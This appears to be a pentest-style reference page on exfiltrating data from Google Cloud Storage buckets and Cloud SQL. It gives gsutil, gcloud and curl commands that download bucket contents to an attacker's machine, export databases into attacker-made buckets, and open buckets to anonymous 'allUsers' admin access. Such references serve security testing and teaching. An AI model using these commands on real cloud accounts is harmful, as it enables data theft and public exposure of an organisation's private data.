Data Exfiltration

Unauthorized data transfer from organization environment to attacker controlled server. Google cloud service where organization store important data are Cloud SQL, Cloud Bucket, Cloud BigQuery and Persistent Disk.

Cloud Storage

Cloud Storage serves as a repository for storing data in object format, offering two types of IAM policies: Bucket Policy (uniform bucket-level access) applied at the bucket level and affecting all objects within, and ACL applied individually at the object level. Various principals (identities) in storage IAM include "allUsers" for unauthenticated users (allowing anonymous access), "allAuthenticatedUsers" for all authenticated users with Google accounts, and IAM for users/groups/service accounts within the same organization/project controlled by IAM policies.

Normal Bucket Data Exfil

List of objects in gcp bucket:

gsutil ls gs://[BUCKET NAME]

Download data from gcp bucket to attacker system:

gsutil cp gs://[BUCKET NAME]/data data

SQL Databases and Buckets Exfil

First copy buckets to local directory:

gsutil cp gs://bucket-name/folder/ .

Then, create a new storage bucket, change perms and export SQL DB:

gsutil mb gs://<googlestoragename>

gsutil acl ch -u <service account> gs://<googlestoragename>

gcloud sql export sql <sql instance name> gs://<googlestoragename>/sqldump.gz --database=<database name>

Data Exfiltrate using changing bucket policy

Data exfiltration via changing bucket policy involves altering the policy to permit universal access to data (objects) within a GCP bucket. This manipulation grants permissions to roles/storage.admin, enabling the modification of bucket policies via the storage.buckets.setIamPolicy permission.

Get the gcp bucket subdomain for an organization (Anonymous - Enum Tool):

cloudenum.py -k example

Get the information about objects in a bucket (Anonymous - Rest API):

curl https://storage.googleapis.com/[BUCKET NAME]

Get the information about iam permission attached to the bucket (Anonymous - Rest API):

https://www.googleapis.com/storage/v1/b/[BUCKET_NAME]/iam/testPermissions?permissions=[storage.buckets.delete&permissions=storage.buckets.get&permissions=storage.buckets.getIamPolicy&permissions=storage.buckets.setIamPolicy&permissions=storage.buckets.update&permissions=storage.objects.create&permissions=storage.objects.delete&permissions=storage.objects.get&permissions=storage.objects.list&permissions=storage.objects.update]

List all roles attached to this bucket (Anonymous - Rest API):

gsutil iam get gs://[BUCKET NAME]

Add an admin role for allUsers (Anonymous - Rest API).

gsutil iam ch allUsers:admin gs://[BUCKET NAME]

Another way is modifying the bucket level IAM policy to allow for all users:

gsutil -i prod-sa@{proyect}.iam.gserviceaccount.com iam ch allUsers:objectViewer gs://[BUCKET NAME]

Last updated